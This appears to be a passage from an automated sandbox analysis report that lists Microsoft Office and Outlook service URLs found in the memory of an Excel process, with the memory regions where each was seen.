      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePV
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRT
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeTR
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeVf
      Source: EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeWgg
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZe
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeaRC
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdatedT
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdatedj
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://onedrive.live.com
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?iointiwD
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comed
      Source: EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netj
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://otelrules.azureedge.netG
      Source: EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office.com
      Source: EXCEL.EXE, 00000000.00000003.414564418.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541998187.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349622287.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comh
      Source: EXCEL.EXE, 00000000.00000002.543359602.0000000012E61000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000000.00000003.414564418.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541998187.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349622287.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com/
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activitiess
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonHNz
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonY
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookJ
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
      Source: EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://powerlift-user.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.netSubstrateOfficeIntelligenceInsightsServicehttps://
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonP
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
      Source: EXCEL.EXE, 00000000.00000003.263403796.00000000131C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://roaming.edog.
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.comBU
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
